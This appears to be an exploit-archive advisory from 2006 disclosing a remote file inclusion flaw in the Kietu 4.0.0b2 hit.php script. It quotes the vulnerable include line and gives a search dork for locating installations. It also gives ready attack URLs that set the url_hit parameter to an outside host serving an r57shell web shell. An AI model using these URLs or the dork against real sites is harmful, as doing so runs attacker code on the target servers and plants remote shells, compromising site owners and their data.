[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Kietu? <= 4.0.0b2 (hit.php) Remote File Include Vulnerability
# Published : 2006-09-26
# Author : D_7J
# Previous Title : paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit
# Next Title : Polaring <= 0.04.03 (general.php) Remote File Include Vulnerability
#==============================================================================================
#Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Download from : http://www.comscripts.com/jump.php?action=script&id=958
#
#Version : 4.0.0b2
#
#================================================================================================
#
#Dork : "Kieto?"
#
#================================================================================================
#Bug in : hit.php
#
#Vlu Code :
#--------------------------------
#
# include_once $url_hit.'class/kdetect.class.php';
#
# example:http://www.kietu.net/files/kietuv4/hit.php?url_hit=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/hit.php?url_hit=http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#
#Special Thx To : Str0ke
#Greetz:DeltahackingSecurityTEAM,Ashiyane,IHS,Simorgh,Shabgard,ICH,
==================================================================================================
# www.Syue.com [2006-09-26]